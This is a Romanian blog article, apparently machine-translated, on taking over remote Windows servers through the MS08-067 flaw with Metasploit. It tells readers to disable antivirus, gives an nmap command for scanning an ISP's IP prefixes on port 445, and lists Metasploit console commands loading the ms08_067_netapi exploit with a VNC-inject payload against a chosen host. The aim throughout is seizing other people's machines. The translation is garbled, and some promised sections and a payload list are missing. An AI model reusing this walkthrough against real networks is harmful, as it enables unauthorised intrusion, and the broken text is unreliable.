Găsit în 60 de secunde metoda de exploatare de la distanță dadik rulează ferestre

Se crede că cu fiecare nouă versiune de Windows devine mai sigură și mai sigură. Chiar și experții NSA și-au pus mâna pe îmbunătățirea securității Windows. Dar Windows este într-adevăr bine protejat în acest fel? Să verificăm împreună. În practică!

Pregătirea sălii de operații

Acum vă voi arăta metoda de extragere a unei dedik remote execută Windows utilizând Metasploit Framework folosind vulnerabilitatea MS08-067. Într-un fel de exploatare a acestui bug-ul este în prezent foarte popular printre hackeri din Orientul Mijlociu și Africa de Nord, după cum reiese din numeroase înregistrări și discuții în Facebook (facebook.com/#!/group.php?gid=73074814856), chiar dacă paginile VKontakte , dedicat aceluiași MSF (vk.com/club16499787), domnește tăcerea completă. Cele mai vulnerabile sunt toate sistemele care execută Windows XP Professional SP2 și SP3 (o listă completă de sisteme de operare cu risc, puteți găsi pe kb.cert.org/vuls/id/827267). Dar, după cum am înțeles din scris, toate produsele moi moi pot fi compromise prin exploatarea acestui bug până în prezent.

Să mergem la afaceri - descărcați cea mai recentă versiune a Metasploit Framework pe site-ul oficial al metasploit.com (sau căutați un disc). Înainte de instalarea pe computer, dezactivați antivirusul. Kit-ul Metasploit Framework include propriul său scaner port de rețea, dar pentru a căuta un mașini conectate la rețea care rulează Windows, putem folosi un scaner Nmap extern, care este, de asemenea, adăugat la distribuția și instalate simultan cu cadru Metasploit. Deci, rulați scanerul nmap, marcând portul 445, pentru că asta este ceea ce avem nevoie pentru o exploatare ulterioară a vulnerabilității serviciului de servere. Și ce, de fapt, vom scana? Răspunsul este destul de simplu - de exemplu, puteți lua și scana IP-prefixelor său, am găsit cu ușurință pe site-ul sub bgp.he.net «prefixe IP v4».

Pentru a utiliza prefixele primite în scanerul nmap, trebuie mai întâi să le copiați într-un fișier - de exemplu, my_isp.txt și să puneți fișierul în directorul de lucru cu nmap. Deci, hai să mergem, comanda de pornire a scanerului va arăta astfel:

nmap -T4 -A -v -PE -PS445 -PA445 -iL my_isp.txt

Tipuri de coajă: metru și altele

Sarcina utilă standard MP poate fi utilizată cu aproape toate exploatările Windows incluse în Metasploit Framework prin selectarea uneia dintre următoarele sarcini utile:

Explicați pe scurt esența fiecăruia.

În funcție de scopul studiului sistemului, oricare dintre aceste sarcini utile poate fi utilizată. Deci, ce așteptăm? Selectați țintă din lista obținută ca rezultat al scanării nmap și conectați-o la ea. Pentru simplitatea experimentului vom folosi un simplu interpret de comandă ca sarcină utilă.

msf> utilizați exploit / windows / smb / ms08_067_netapi
msf exploit> setați PAYLOAD windows / vncinject / bind_tcp
PAYLOAD => windows / vncinject / bind_tcp
msf exploitați (ms08_067_netapi)> setați RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit (ms08_067_netapi)> exploita

Captură de server

concluzie

Dacă cineva vrea doar să apăsați pe butonul «exploata», pentru a Metasploit a dat imediat Dedik gata, atunci trebuie să spun - acest lucru nu se va întâmpla: metoda necesită încă timp și răbdare. Vulnerabilitatea este departe de a fi nouă, iar vânzătorii de software au luat deja măsuri pentru a-l localiza.

Deci, dacă un antivirus este instalat pe o mașină la distanță sau dacă Centrul de securitate Windows este configurat corect, accesul la portul 445 din rețeaua externă nu este posibil. În special, Kaspersky Anti-Virus va reacționa la schimbarea fișierelor de sistem, informând prompt utilizatorul despre acest lucru. Deși un atac din partea rețelei locale poate conduce la compromiterea completă a sistemului. În ciuda tuturor lucrurilor, există încă un câmp destul de larg pentru experimente cu securitate Windows, și puteți contribui la această chestiune. Contribuție incorectă :).

Microsoft la un moment dat a anunțat chiar o primă de 250.000 de dolari pentru informații care ar ajuta la prinderea creatorului acestui vierme. "Dar acesta este un trecut îndepărtat!" - obiectați și veți avea dreptate parțială. Dar numai în parte, pentru că astăzi situația nu sa schimbat prea mult.

Distribuiți acest articol cu ​​prietenii dvs.: